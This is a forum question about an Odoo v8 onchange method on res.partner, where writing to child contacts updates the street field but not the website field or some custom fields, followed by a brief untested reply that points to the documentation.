11/7/2000. Dave Winer: Dan Brickley’s message
I just subscribed to this list for a moment, to rebut Dan’s assertion that <scriptingNews> format was derived from CDF. It was not. It was derived from my experience as a web writer and web app developer and that’s all. I documented my work through 1997-2000 on this stuff, publicly.
11/7/2000. Seth Russell: Re: [RSS-DEV] RSS-Classic, RSS 1.0 and a historical debt
[addressing Dan Brickley] Look, this thing is past the point of justifications being important. … Now, personally I don’t have any vested interest (ego) in either the WG group or in Dave’s group. But it doesn’t feel right to me. I don’t understand the divisive stubbornness that keeps the WG from just changing the name. But I do see the political magic that would happen if we just changed it. Especially since XRSS is the better name anyway and actually names this thing politically correct.
Heal the Rift
Start anew
Change the name!
The name was never changed.
§
§
© 2001–present Mark Pilgrim | http://web.archive.org/web/20110718031950/http:/diveintomark.org/archives/2002/09/06/history_of_the_rss_fork | CC-MAIN-2014-52 | refinedweb | 5,338 | 72.26 |
Python Programming/Conditional Statements
Decisions
A decision is when a program has more than one possible course of action, depending on a variable's value. Think of a traffic light: when it is green, we continue driving; when we see the light turn yellow, we reduce our speed; and when it is red, we stop. These are logical decisions that depend on the value of the traffic light. Luckily, Python has a decision statement to help us when our application needs to make such a decision.
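The traffic-light decision described above can be sketched in Python like this (the light value is a stand-in for real input):

```python
light = "yellow"  # a stand-in value; a real program would read this from input

if light == "green":
    action = "continue driving"
elif light == "yellow":
    action = "reduce speed"
else:  # red
    action = "stop"

print(action)
```

Each branch runs only when its condition is the first one to be true, which is exactly the behavior described in the paragraph above.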
If statements
Here is a warm-up exercise - a short program to compute the absolute value of a number:
absoval.py
n = input("Integer? ")  # Pick an integer. (In Python 2, use raw_input() instead of input().)
n = int(n)              # Convert the text that was typed in into an integer.
if n < 0:
    print ("The absolute value of", n, "is", -n)
else:
    print ("The absolute value of", n, "is", n)
Here is the output from the two times that I ran this program:
Integer? -34
The absolute value of -34 is 34

Integer? 1
The absolute value of 1 is 1
What does the computer do when it sees this piece of code? First it prompts the user for a number with the statement "n = input("Integer? ")". Next it reads the line "if n < 0:". If n is less than zero, Python runs the line "print ("The absolute value of", n, "is", -n)". Otherwise, Python runs the line "print ("The absolute value of", n, "is", n)".
More formally, Python looks at whether the expression n < 0 is true or false. An if statement is followed by an indented block of statements that are run when the expression is true. After the if statement is an optional else statement and another indented block of statements. This 2nd block of statements is run if the expression is false.
Expressions can be tested several different ways. Here is a table of the comparison operators:

  operator   function
  <          less than
  <=         less than or equal to
  >          greater than
  >=         greater than or equal to
  ==         equal to
  !=         not equal to
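A quick sketch of these tests in action (illustrative values):

```python
a = 3
b = 5

# Each comparison evaluates to one of the booleans True or False.
print(a < b)    # True
print(a == b)   # False
print(a >= b)   # False
print(a != b)   # True
```

Any of these expressions can be used directly as the condition of an if statement.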
Another feature of the if command is the elif statement. It stands for "else if": if the original if expression is false and the elif expression is true, the block of code following the elif statement is executed. elif allows multiple tests to be done in a single if statement.
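A small sketch of an elif chain in action (an illustrative example; the loop bound and messages are chosen for demonstration):

```python
a = 0
while a < 10:
    a += 1
    if a > 5:
        # this branch wins once a passes 5
        print(a, "is greater than 5")
    elif a == 5:
        # checked only when the first test was false
        print(a, "equals 5")
    else:
        # runs when every test above was false
        print(a, "is less than 5")
```

Only the first branch whose condition is true runs on each pass through the loop; the remaining branches are skipped.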
If Example
High_low.py
# Plays the guessing game higher or lower
# (originally written by Josh Cogliati, improved by Quique, now improved
# by Sanjith, further improved by VorDd, with continued improvement from
# the various Wikibooks contributors.)

# This should actually be something that is semi random like the
# last digits of the time or something else, but that will have to
# wait till a later chapter. (Extra Credit, modify it to be random
# after the Modules chapter)

# This is for demonstration purposes only.
# It is not written to handle invalid input like a full program would.

answer = 23
question = 'What number am I thinking of? '

print ('Let\'s play the guessing game!')
while True:
    guess = int(input(question))
    if guess < answer:
        print ('Little higher')
    elif guess > answer:
        print ('Little lower')
    else:  # guess == answer
        print ('MINDREADER!!!')
        break
Sample run:
Let's play the guessing game! What number am I thinking of? 22 Little higher What number am I thinking of? 25 Little Lower What number am I thinking of? 23 MINDREADER!!!
As it states in its comments, this code is not prepared to handle invalid input (i.e., strings instead of numbers). If you are wondering how you would implement such functionality in Python, you are referred to the Errors Chapter of this book, where you will learn about error handling. For the above code you may try this slight modification of the while loop:
while True:
    inp = input(question)
    try:
        guess = int(inp)
    except ValueError:
        print('Your guess should be a number')
    else:
        if guess < answer:
            print ('Little higher')
        elif guess > answer:
            print ('Little lower')
        else:  # guess == answer
            print ('MINDREADER!!!')
            break
even.py
#Asks for a number.
#Prints if it is even or odd.

print ("Input [x] for exit.")
while True:
    inp = input("Tell me a number: ")
    if inp == 'x':
        break
    # catch any resulting ValueError during the conversion to float
    try:
        number = float(inp)
    except ValueError:
        print('I said: Tell me a NUMBER!')
    else:
        test = number % 2
        if test == 0:
            print (int(number), "is even.")
        elif test == 1:
            print (int(number), "is odd.")
        else:
            print (number, "is very strange.")
Sample runs.
Tell me a number: 3
3 is odd.
Tell me a number: 2
2 is even.
Tell me a number: 3.14159
3.14159 is very strange.
average1.py
#Prints the average of three numbers.
print ("Welcome to the average calculator program")
print ("NOTE- THIS PROGRAM ONLY CALCULATES AVERAGES FOR 3 NUMBERS")
x = int(input("Please enter the first number "))
y = int(input("Please enter the second number "))
z = int(input("Please enter the third number "))
total = x + y + z
print (total / 3.0)
#MADE BY SANJITH sanrubik@gmail.com
Sample runs
Welcome to the average calculator program
NOTE- THIS PROGRAM ONLY CALCULATES AVERAGES FOR 3 NUMBERS
Please enter the first number 7
Please enter the second number 6
Please enter the third number 4
5.666666666666667
average2.py
#Keeps asking for numbers until count have been entered.
#Prints the average value.
total = 0.0
print ("This program will take several numbers, then average them.")
count = int(input("How many numbers would you like to sum: "))
current_count = 0
while current_count < count:
    print ("Number", current_count)
    number = float(input("Enter a number: "))
    total = total + number
    current_count += 1
print ("The average was:", total / count)
Sample runs
This program will take several numbers, then average them.
How many numbers would you like to sum: 2
Number 0
Enter a number: 3
Number 1
Enter a number: 5
The average was: 4.0

This program will take several numbers, then average them.
How many numbers would you like to sum: 3
Number 0
Enter a number: 1
Number 1
Enter a number: 4
Number 2
Enter a number: 3
The average was: 2.6666666666666665
average3.py
#Continuously updates the average as new numbers are entered.
print ("Welcome to the Average Calculator, please insert a number")
currentaverage = 0
numofnums = 0
while True:
    newnumber = int(input("New number "))
    numofnums = numofnums + 1
    currentaverage = round(((currentaverage * (numofnums - 1)) + newnumber) / numofnums, 3)
    print ("The current average is " + str(round(currentaverage, 3)))
Sample runs
Welcome to the Average Calculator, please insert a number
New number 1
The current average is 1.0
New number 3
The current average is 2.0
New number 6
The current average is 3.333
New number 6
The current average is 4.0
New number
If Exercises
- Write a password guessing program that keeps track of how many times the user has entered the password wrong. If the user gets it wrong more than 3 times, print "You have been denied access." and terminate the program. If the password is correct, print "You have successfully logged in." and terminate the program.
- Write a program that asks for two numbers. If the sum of the numbers is greater than 100, print That is a big number and terminate the program.
- Write a program that asks the user their name. If they enter your name, say "That is a nice name." If they enter "John Cleese" or "Michael Palin", tell them how you feel about them ;), otherwise tell them "You have a nice name."
- Ask the user to enter the password. If the password is correct, print "You have successfully logged in" and exit the program. If the password is wrong, print "Sorry the password is wrong" and let the user try again, up to 3 times in total. After the third wrong attempt, print "You have been denied access" and exit the program.
## Password guessing program using if and while statements only
### source by zain
guess_count = 0
correct_pass = 'dee234'
while True:
    pass_guess = input("Please enter your password: ")
    guess_count += 1
    if pass_guess == correct_pass:
        print ('You have successfully logged in.')
        break
    elif guess_count >= 3:
        print ("You have been denied access.")
        break
def mard():
    for i in range(1, 4):
        a = input("enter a password: ")  # ask for the password
        b = "sefinew"                    # the correct password
        if a == b:
            # the entered password matches: report success and stop
            print ("You have successfully logged in")
            return  # 'return' ends the function without killing the shell, unlike exit()
        # the entered password does not match
        print ("Sorry the password is wrong")
    print ("You have been denied access")

mard()
#Source by Vanchi
import time
import getpass

password = getpass.getpass("Please enter your password: ")
print ("Waiting for 3 seconds")
time.sleep(3)

got_it_right = False
for number_of_tries in range(1, 4):
    reenter_password = getpass.getpass("Please reenter your password: ")
    if password == reenter_password:
        print ("You are logged in! Welcome, user :)")
        got_it_right = True
        break

if not got_it_right:
    print ("Access Denied!!")
Conditional Expressions
Many languages (like Java and PHP) have the concept of a one-line conditional (called The Ternary Operator), often used to simplify conditionally accessing a value. For instance (in Java):
int number = 0; // in practice, read from program input
// a normal conditional assignment
int res;
if (number < 0)
    res = -number;
else
    res = number;
// the same assignment written with the ternary operator
int res2 = (number < 0) ? -number : number;
For many years Python did not have an equivalent construct natively; however, you could replicate it by constructing a tuple of results and using the test as the index into the tuple, like so:
number = int(input("Enter a number to get its absolute value:"))
res = (-number, number)[number > 0]
It is important to note that, unlike a built in conditional statement, both the true and false branches are evaluated before returning, which can lead to unexpected results and slower executions if you're not careful. To resolve this issue, and as a better practice, wrap whatever you put in the tuple in anonymous function calls (lambda notation) to prevent them from being evaluated until the desired branch is called:
number = int(raw_input("Enter a number to get its absolute value:"))
res = (lambda: number, lambda: -number)[number < 0]()
Since Python 2.5, however, there has been an equivalent operator (though not called such, and with a totally different syntax):
number = int(raw_input("Enter a number to get its absolute value:"))
res = -number if number < 0 else number
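One place the conditional expression shines is inside larger expressions, for instance a list comprehension. A small sketch (the input list is made up for illustration):

```python
numbers = [-3, 4, -1]

# The conditional expression picks a value per element, right inside the comprehension.
absolutes = [(-n if n < 0 else n) for n in numbers]
print(absolutes)  # [3, 4, 1]
```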
Switch

Python has no built-in switch statement, but you can emulate one by storing functions in a list (an array) and indexing into it:

def hello():
    print ("Hello")

def bye():
    print ("Bye")

def hola():
    print ("Hola is Spanish for Hello")

def adios():
    print ("Adios is Spanish for Bye")

# Notice that our switch statement is a regular variable, only that we added
# the functions' names inside and there are no quotes
menu = [hello, bye, hola, adios]

# To call our switch statement, we simply make reference to the array with
# a pair of parentheses at the end to call the function
menu[3]() # calls the adios function, since it is number 3 in our array
menu[0]() # calls the hello function, being the first element in our array

x = 1
menu[x]() # calls the bye function, as it is the second element in the array
This works because Python stores a reference to the function in the array at its particular index, and by adding a pair of parentheses we are actually calling the function. Here the last line is equivalent to:

bye()
Another way: using functions through user input
go = "y"
x = 0

def hello():
    print ("Hello")

def bye():
    print ("Bye")

def hola():
    print ("Hola is Spanish for Hello")

def adios():
    print ("Adios is Spanish for Bye")

menu = [hello, bye, hola, adios]

while x < len(menu):
    print "function", menu[x].__name__, ", press ", "[" + str(x) + "]"
    x += 1

while go != "n":
    c = input("Select Function: ")
    menu[c]()
    go = raw_input("Try again? [y/n]: ")

print "\nBye!"
# end
Another way
if x == 0:
    hello()
elif x == 1:
    bye()
elif x == 2:
    hola()
else:
    adios()
Another way
Another way is to use lambdas. Code pasted here with permission[1].
result = {
    'a': lambda x: x * 5,
    'b': lambda x: x + 7,
    'c': lambda x: x - 2
}[value](x)
For more information on lambda see anonymous functions in the function section. | https://en.wikibooks.org/wiki/Python_Programming/Conditional_Statements | CC-MAIN-2017-13 | refinedweb | 2,025 | 62.17 |
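A common refinement of the dictionary dispatch above is adding a default branch with dict.get, which plays the role of a switch statement's "default:" case. A minimal sketch (function names and keys are made up; Python 3 syntax):

```python
def hello():
    return "Hello"

def bye():
    return "Bye"

def default():
    return "Unknown option"

# Dispatch table: keys act as the switch labels, values are the functions.
menu = {'h': hello, 'b': bye}

# dict.get falls back to the default handler when the key is missing.
choice = 'x'
result = menu.get(choice, default)()
print(result)  # Unknown option
```

Because the functions are only referenced in the table (not called), nothing runs until the trailing parentheses, avoiding the eager-evaluation pitfall of the tuple trick above.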
Minimal Pandas Subset for Data Scientists
Pandas is a vast library.
Data manipulation is a breeze with pandas, and it has become such a standard for it that a lot of parallelization libraries like Rapids and Dask are being created in line with Pandas syntax.
Still, I generally have some issues with it.
There are multiple ways of doing the same thing in Pandas, and that might make it troublesome for a beginner.
This has inspired me to come up with a minimal subset of pandas functions I use while coding.
I have tried it all, and currently, I stick to a particular way. It is like a mind map.
Sometimes because it is fast, sometimes because it's more readable, and sometimes because I can do it with my current knowledge. And sometimes because I know that a particular way will be a headache in the long run (think multi-index).
This post is about handling most of the data manipulation cases in Python using a straightforward, simple, and matter of fact way.
With a sprinkling of some recommendations throughout.
I will be using a data set of 1,000 popular movies on IMDB in the last ten years. You can also follow along in the Kaggle Kernel.
Some Default Pandas Requirements
As good as the Jupyter notebooks are, some things still need to be specified when working with Pandas.
Sometimes your notebook won't show you all the columns, or will truncate the rows, when you print a dataframe. You can control this behavior by setting some defaults of your own while importing Pandas. You can automate it using this addition to your notebook.
For instance, this is the setting I use.
import pandas as pd

# pandas defaults
pd.options.display.max_columns = 500
pd.options.display.max_rows = 500
Reading Data with Pandas
The first thing we do is reading the data source and so here is the code for that.
df = pd.read_csv("IMDB-Movie-Data.csv")
Recommendation: I could also have used pd.read_table to read the file. The thing is that pd.read_csv uses , as its default separator, and thus it saves me some code. I also genuinely don't see the need for pd.read_table.
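For what it's worth, pd.read_csv handles other delimiters too by passing sep, which is why read_table rarely adds anything. A small sketch, using an in-memory string in place of a file (the data is made up):

```python
import io
import pandas as pd

# Tab-separated text standing in for a file on disk.
tsv_data = "Title\tRating\nGuardians\t8.1\n"

# sep="\t" makes read_csv behave like read_table.
df = pd.read_csv(io.StringIO(tsv_data), sep="\t")
print(df['Rating'].tolist())  # [8.1]
```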
If your data is in some SQL Datasource, you could have used the following code. You get the results in the dataframe format.
# query holds your SQL string, db is a database connection object
df = pd.read_sql(query, db)
Data Snapshot
Always useful to see some of the data.
You can use simple head and tail commands with an option to specify the number of rows.
# top 5 rows
df.head()

# top 50 rows
df.head(50)

# last 5 rows
df.tail()

# last 50 rows
df.tail(50)
You can also see simple dataframe statistics with the following commands.
# To get statistics of numerical columns df.describe()
# To get the maximum value of a column. When you take a single column you can
# think of it as a list and apply functions you would apply to a list.
# You can also use min, for instance.
print(max(df['Rating']))

# Number of rows in the dataframe
print(len(df))

# Shape of the dataframe
print(df.shape)
9.0
1000
(1000, 12)
Recommendation: Generally working with Jupyter notebook,I make it a point of having the first few cells in my notebook containing these snapshots of the data. This helps me see the structure of the data whenever I want to. If I don’t follow this practice, I notice that I end up repeating the
.head() command a lot of times in my code.
Handling Columns in Dataframes
a. Selecting a column
For some reason Pandas lets you choose columns in two ways. Using the dot operator like
df.Title and using square brackets like
df['Title']
I prefer the second version, mostly. Why?
There are a couple of reasons you would be better off with the square bracket version in the longer run.
If your column name contains spaces, then the dot version won’t work. For example,
df.Revenue (Millions)won’t work while
df['Revenue (Millions)']will.
It also won’t work if your column name is
countor
meanor any of pandas predefined functions.
Sometimes you might need to create a for loop over your column names in which your column name might be in a variable. In that case, the dot notation will not work. For Example, This works:
colname = 'height'
df[colname]
While this doesn’t:
colname = 'height'
df.colname
Trust me. Saving a few characters is not worth it.
Recommendation: Stop using the dot operator. It is a construct that originated from a different language (R) and respectfully should be left there.
b. Getting Column Names in a list
You might need a list of columns for some later processing.
columnnames = df.columns
c. Specifying user-defined Column Names:
Sometimes you want to change the column names as per your taste. I don’t like spaces in my column names, so I change them as such.
df.columns = ['Rank', 'Title', 'Genre', 'Description', 'Director', 'Actors', 'Year', 'Runtime_Minutes', 'Rating', 'Votes', 'Revenue_Millions', 'Metascore']
I could have used another way.
This is the one case where both of the versions are important. When I have to change a lot of column names, I go with the way above. When I have to change the name of just one or two columns I use:
df.rename(columns = {'Revenue (Millions)':'Rev_M','Runtime (Minutes)':'Runtime_min'},inplace=True)
d. Subsetting specific columns:
Sometimes you only need to work with particular columns in a dataframe. e.g., to separate numerical and categorical columns, or remove unnecessary columns. Let’s say in our example; we don’t need the description, director, and actor column.
df = df[['Rank', 'Title', 'Genre', 'Year','Runtime_min', 'Rating', 'Votes', 'Rev_M', 'Metascore']]
e. Seeing column types:
Very useful while debugging. If your code throws an error that you cannot add a str and int, you will like to run this command.
df.dtypes
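The dtype information is also what lets you split numeric from categorical columns, as mentioned in the subsetting section above. A minimal sketch using select_dtypes (the toy dataframe here is made up for illustration):

```python
import pandas as pd

df = pd.DataFrame({'Title': ['Guardians', 'Sing'],
                   'Rating': [8.1, 7.2],
                   'Votes': [757074, 60545]})

# 'number' matches all numeric dtypes (int64, float64, ...).
numeric_df = df.select_dtypes(include='number')  # Rating, Votes
object_df = df.select_dtypes(exclude='number')   # Title

print(list(numeric_df.columns))  # ['Rating', 'Votes']
```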
Applying Functions on DataFrame: Apply and Lambda
apply and
lambda are some of the best things I have learned to use with pandas.
I use
apply and
lambda anytime I get stuck while building a complex logic for a new column or filter.
a. Creating a Column
But sometimes we may need to build complex logic around the creation of new columns.
To give you a convoluted example, let’s say that we want to build a custom movie score based on a variety of factors.
Say, if the movie is of the thriller genre, I want to add 1 to the IMDB rating, subject to the condition that the rating stays less than or equal to 10. And if a movie is a comedy, I want to subtract 1 from the rating.
How do we do that?
Whenever I get a hold of such complex problems, I use
apply/lambda. Let me first show you how I will do this.
def custom_rating(genre,rating):
    if 'Thriller' in genre:
        return min(10,rating+1)
    elif 'Comedy' in genre:
        return max(0,rating-1)
    else:
        return rating

df['CustomRating'] = df.apply(lambda x: custom_rating(x['Genre'],x['Rating']),axis=1)
The general structure is:
You define a function that will take the column values you want to play with to come up with your logic. Here the only two columns we end up using are genre and rating.
You use an apply function with lambda along the row with axis=1. The general syntax is:
df.apply(lambda x: func(x['col1'],x['col2']),axis=1)
You should be able to create pretty much any logic using apply/lambda since you just have to worry about the custom function.
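When the logic depends on only one column, you can also apply directly on that column as a Series, skipping axis=1 entirely. A small sketch (standalone made-up data, not the IMDB file):

```python
import pandas as pd

df = pd.DataFrame({'Rating': [8.5, 6.0, 9.2]})

# Series.apply passes each value (not each row) to the function,
# so no axis argument is needed.
df['Verdict'] = df['Rating'].apply(lambda r: 'good' if r > 8 else 'ok')
print(df['Verdict'].tolist())  # ['good', 'ok', 'good']
```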
b. Filtering a dataframe
Pandas make filtering and subsetting dataframes pretty easy. You can filter and subset dataframes using normal operators and
&,|,~ operators.
# Single condition: dataframe with all movies rated greater than 8
df_gt_8 = df[df['Rating']>8]

# Multiple conditions: AND - all movies rated greater than 8 with more than 100000 votes
And_df = df[(df['Rating']>8) & (df['Votes']>100000)]

# Multiple conditions: OR - all movies rated greater than 8 or having a Metascore above 80
Or_df = df[(df['Rating']>8) | (df['Metascore']>80)]

# Multiple conditions: NOT - all movies rated greater than 8 or having a Metascore above 80 are excluded
Not_df = df[~((df['Rating']>8) | (df['Metascore']>80))]
Pretty simple stuff.
But sometimes we may need to do complex filtering operations.
And sometimes we need to do some operations which we won’t be able to do using just the above format.
For instance: Let us say we want to filter those rows where the number of words in the movie title is greater than or equal to 4.
How would you do it?
Trying the below will give you an error. Apparently, you cannot do anything as simple as split with a series.
new_df = df[len(df['Title'].split(" "))>=4]
AttributeError: 'Series' object has no attribute 'split'
One way is first to create a column which contains no of words in the title using apply and then filter on that column.
# create a new column
df['num_words_title'] = df.apply(lambda x : len(x['Title'].split(" ")),axis=1)

# simple filter on the new column
new_df = df[df['num_words_title']>=4]
And that is a perfectly fine way as long as you don’t have to create a lot of columns. But I prefer this:
new_df = df[df.apply(lambda x : len(x['Title'].split(" "))>=4,axis=1)]
What I did here is that my apply function returns a boolean which can be used to filter.
Now once you understand that you just have to create a column of booleans to filter, you can use any function/logic in your apply statement to get however complex a logic you want to build.
Let us see another example. I will try to do something a little complex to show the structure.
We want to find movies for which the revenue is less than the average revenue for that particular year?
import numpy as np

year_revenue_dict = df.groupby(['Year']).agg({'Rev_M':np.mean}).to_dict()['Rev_M']

def bool_provider(revenue, year):
    return revenue<year_revenue_dict[year]

new_df = df[df.apply(lambda x : bool_provider(x['Rev_M'],x['Year']),axis=1)]
We have a function here which we can use to write any logic. That provides a lot of power for advanced filtering as long as we can play with simple variables.
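For this particular kind of filter there is also a shortcut worth knowing: groupby(...).transform broadcasts each group's mean back onto every row, so you can compare directly without building a dictionary. A sketch with made-up data:

```python
import pandas as pd

df = pd.DataFrame({'Year':  [2006, 2006, 2007, 2007],
                   'Rev_M': [10.0, 30.0, 5.0, 15.0]})

# transform returns a Series aligned with df, holding each row's group mean.
year_mean = df.groupby('Year')['Rev_M'].transform('mean')
below_avg = df[df['Rev_M'] < year_mean]
print(below_avg['Rev_M'].tolist())  # [10.0, 5.0]
```

The apply-based version above stays more flexible for arbitrary logic; transform is the tidier option when the condition is a simple comparison against a group statistic.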
c. Change Column Types
I even use apply to change the column types since I don’t want to remember the syntax for changing column type and also since it lets me do much more complicated things.
The usual syntax to change column type is astype in Pandas. So if I had a column named price in my data in an str format. I could do this:
df['Price'] = df['Price'].astype('int')
But sometimes it won’t work as expected.
You might get the error:
ValueError: invalid literal for long() with base 10: ‘13,000’. That is you cannot cast a string with “,” to an int. To do that we first have to get rid of the comma.
After facing this problem time and again, I have stopped using astype altogether now and just use apply to change column types.
df['Price'] = df.apply(lambda x: int(x['Price'].replace(',', '')),axis=1)
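For this specific conversion, pandas also offers a vectorized route: strip the commas with the Series str accessor, then convert with pd.to_numeric. A sketch on made-up data:

```python
import pandas as pd

df = pd.DataFrame({'Price': ['13,000', '1,500']})

# regex=False treats ',' as a literal string, not a pattern.
df['Price'] = pd.to_numeric(df['Price'].str.replace(',', '', regex=False))
print(df['Price'].tolist())  # [13000, 1500]
```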
And lastly, there is progress_apply
progress_apply is a function that comes with the tqdm package.
And this has saved me a lot of time.
Sometimes when you have got a lot of rows in your data, or you end up writing a pretty complex apply function, you will see that apply might take a lot of time.
I have seen apply taking hours when working with Spacy. In such cases, you might like to see the progress bar with
apply.
You can use
tqdm for that.
After the initial imports at the top of your notebook, just replace
apply with
progress_apply and everything remains the same.
from tqdm import tqdm, tqdm_notebook
tqdm_notebook().pandas()

df.progress_apply(lambda x: custom_rating(x['Genre'],x['Rating']),axis=1)
And you get progress bars.
Recommendation: Whenever you see that you have to create a column with custom complex logic, think of apply and lambda. Try using progress_apply too.
Aggregation on Dataframes: groupby
groupby will come up a lot of times whenever you want to aggregate your data. Pandas lets you do this efficiently with the groupby function.
There are a lot of ways that you can use groupby. I have seen a lot of versions, but I prefer a particular style since I feel the version I use is easy, intuitive, and scalable for different use cases.
df.groupby(list of columns to groupby on).aggregate({'colname':func1, 'colname2':func2}).reset_index()
Now you see it is pretty simple. You just have to worry about supplying two primary pieces of information.
List of columns to groupby on, and
A dictionary of columns and functions you want to apply to those columns
reset_index() is a function that resets the index of a dataframe. I apply this function ALWAYS whenever I do a groupby, and you might think of it as a default syntax for groupby operations.
Let us check out an example.
# Find out the sum of votes and revenue by year
import numpy as np

df.groupby(['Year']).aggregate({'Votes':np.sum, 'Rev_M':np.sum}).reset_index()
You might also want to group by more than one column. It is fairly straightforward.
df.groupby(['Year','Genre']).aggregate({'Votes':np.sum, 'Rev_M':np.sum}).reset_index()
Recommendation: Stick to one syntax for groupby. Pick your own if you don’t like mine but stick to one.
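If you also want the output columns renamed in the same step, newer pandas versions (0.25+) support named aggregation, which keeps the result flat — no multi-index columns to untangle. A sketch with made-up data:

```python
import pandas as pd

df = pd.DataFrame({'Year':  [2006, 2006, 2007],
                   'Votes': [100, 200, 300],
                   'Rev_M': [10.0, 20.0, 5.0]})

# Each keyword becomes an output column: new_name=(source_column, function).
summary = (df.groupby('Year')
             .agg(total_votes=('Votes', 'sum'),
                  mean_revenue=('Rev_M', 'mean'))
             .reset_index())
print(summary['total_votes'].tolist())  # [300, 300]
```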
Dealing with Multiple Dataframes: Concat and Merge:
a. concat
Sometimes we get data from different sources. Or someone comes to you with multiple files with each file having data for a particular year.
How do we create a single dataframe from a single dataframe?
Here we will create our use case artificially since we just have a single file. We are creating two dataframes first using the basic filter operations we already know.
movies_2006 = df[df['Year']==2006]
movies_2007 = df[df['Year']==2007]
Here we start with two dataframes:
movies_2006 containing info for movies released in 2006 and
movies_2007 containing info for movies released in 2007. We want to create a single dataframe that includes movies from both 2006 and 2007
movies_06_07 = pd.concat([movies_2006,movies_2007])
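One thing to watch: pd.concat keeps each input's original row index, so the combined frame can contain duplicate index labels. Passing ignore_index=True renumbers the rows cleanly. A minimal sketch on made-up data:

```python
import pandas as pd

a = pd.DataFrame({'Title': ['A'], 'Year': [2006]})
b = pd.DataFrame({'Title': ['B'], 'Year': [2007]})

# Without ignore_index, both rows would carry index label 0.
combined = pd.concat([a, b], ignore_index=True)
print(combined.index.tolist())  # [0, 1]
```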
b. merge
Most of the data that you will encounter will never come in a single file. One of the files might contain ratings for a particular movie, and another might provide the number of votes for a movie.
In such a case we have two dataframes which need to be merged so that we can have all the information in a single view.
Here we will create our use case artificially since we just have a single file. We are creating two dataframes first using the basic column subset operations we already know.
rating_dataframe = df[['Title','Rating']]
votes_dataframe = df[['Title','Votes']]
We need to have all this information in a single dataframe. How do we do this?
rating_vote_df = pd.merge(rating_dataframe, votes_dataframe, on='Title', how='left')
rating_vote_df.head()
We provide this merge function with four attributes- 1st DF, 2nd DF, join on which column and the joining criteria:
['left','right','inner','outer']
Recommendation: I usually always end up using a left join. You will rarely need an outer or right join. Actually, whenever you need a right join, you really just need a left join with the order of the dataframes reversed in the merge function.
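To make that last point concrete, here is a sketch (made-up data) showing that a right join and a left join with the dataframes swapped produce the same rows, with only the column order differing:

```python
import pandas as pd

ratings = pd.DataFrame({'Title': ['A', 'B'], 'Rating': [8.0, 7.0]})
votes = pd.DataFrame({'Title': ['B', 'C'], 'Votes': [10, 20]})

right_join = pd.merge(ratings, votes, on='Title', how='right')
left_swapped = pd.merge(votes, ratings, on='Title', how='left')

# Both keep every row of `votes`: titles B and C.
print(sorted(right_join['Title']))   # ['B', 'C']
print(sorted(left_swapped['Title'])) # ['B', 'C']
```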
Reshaping Dataframes: Melt and pivot_table(reverseMelt)
Most of the time, we don’t get data in the exact form we want.
For example, sometimes we might have data in columns which we might need in rows.
Let us create an artificial example again. You can look at the code below that I use to create the example, but really it doesn’t matter.
genre_set = set()
for genre in df['Genre'].unique():
    for g in genre.split(","):
        genre_set.add(g)

for genre in genre_set:
    df[genre] = df['Genre'].apply(lambda x: 1 if genre in x else 0)

working_df = df[['Title', 'Rating', 'Votes', 'Rev_M'] + list(genre_set)]
working_df.head()
So we start from a working_df like this:
Now, this is not particularly a great structure to have data in. We might like it better if we had a dataframe with only one column Genre and we can have multiple rows repeated for the same movie. So the movie ‘Prometheus’ might be having three rows since it has three genres. How do we make that work?
We use melt:

reshaped_df = pd.melt(working_df,
                      id_vars=['Title', 'Rating', 'Votes', 'Rev_M'],
                      value_vars=list(genre_set),
                      var_name='Genre',
                      value_name='Flag')
reshaped_df.head()
So in this melt function, we provided five attributes:
dataframe_name = working_df
id_vars: List of vars we want in the current form only.
value_vars: List of vars we want to melt/put in the same column
var_name: name of the column for value_vars
value_name: name of the column for value of value_vars
There is still one thing remaining. For Prometheus, there is a Thriller row with flag 0, meaning Prometheus is not a thriller. Such flag-0 rows are unnecessary data we can filter out, and we will have our result: we keep only the genres with flag 1.
reshaped_df = reshaped_df[reshaped_df['Flag']==1]
What if we want to go back? We need the values in a column to become multiple columns. How? We use pivot_table:
re_reshaped_df = reshaped_df.pivot_table(index=['Title', 'Rating', 'Votes', 'Rev_M'],
                                         columns='Genre',
                                         values='Flag',
                                         aggfunc='sum').reset_index()
re_reshaped_df.head()
We provided four attributes to the pivot_table function.
index: We don’t want to change these column structures
columns: explode this column into multiple columns
values: use this column to aggregate
aggfunc: the aggregation function.
We can then fill the missing values with 0 using fillna:

re_reshaped_df = re_reshaped_df.fillna(0)
Recommendation: Multiple columns to one column: melt. One column to multiple columns: pivot_table. There are other ways to melt (stack) and other ways to pivot (pivot, unstack). Stay away from them and just use melt and pivot_table. There are valid reasons for this: unstack and stack create a multi-index, which we don't want to deal with, and pivot cannot take multiple columns as the index.
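The whole melt → filter → pivot_table round trip can be sketched end-to-end on a tiny hypothetical frame:

```python
import pandas as pd

# Minimal stand-in for working_df: one-hot genre flags per title.
wd = pd.DataFrame({'Title': ['A', 'B'],
                   'Rating': [8.0, 7.5],
                   'Action': [1, 0],
                   'Drama': [1, 1]})

long = pd.melt(wd, id_vars=['Title', 'Rating'],
               value_vars=['Action', 'Drama'],
               var_name='Genre', value_name='Flag')
long = long[long['Flag'] == 1]  # keep only the genres a movie actually has

wide = long.pivot_table(index=['Title', 'Rating'], columns='Genre',
                        values='Flag', aggfunc='sum').reset_index().fillna(0)
print(sorted(wide.columns))  # ['Action', 'Drama', 'Rating', 'Title']
```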
Conclusion
With Pandas, less choice is more
Here I have tried to profile some of the most useful functions in pandas I end up using most often.
Pandas is a vast library with a lot of functionality and custom options. That makes it essential that you should have a mindmap where you stick to a particular syntax for a specific thing.
Here I have shared mine, and you can proceed with it and make it better as your understanding of the library grows.
I hope you found this post useful and worth your time. I tried to make this as simple as possible, but you may always ask me or see the documentation for doubts.
Whole code and data are posted in the Kaggle Kernel.
Also, if you want to learn more about Python 3, I would like to call out an excellent course on Learn Intermediate level Python from the University of Michigan. Do check it out.
I am going to be writing more of such posts in the future too. Let me know what you think about them. Follow me up at Medium or Subscribe to my blog to be informed about them. As always, I welcome feedback and constructive criticism and can be reached on Twitter @mlwhiz. | https://mlwhiz.com/blog/2019/07/20/pandas_subset/ | CC-MAIN-2020-16 | refinedweb | 3,266 | 65.42 |
Odoo v8: can't write into website field (model: res.partner)
I've created my own field company_origin. It is only visible if the partner (res.partner model) is a company.
The field company_origin is a Many2one field, related to a model origin which I added to res.partner.
My problem is that I can't write values into the children of the company. For some fields it works (e.g. street) but for some it doesn't (e.g. website). I also cannot write to the fields that I added to res.partner with my own model.
Here is some code that shows my problem, street changes but website doesnt (both are fields.Char() fields).
@api.onchange('company_origin')
def _set_children_origin(self):
    if self.child_ids != False:
        for child in self.child_ids:
            child.street = "teststreet"
            child.website = "testsite"
Thanks, for any advice.
see documentation (not tested) :
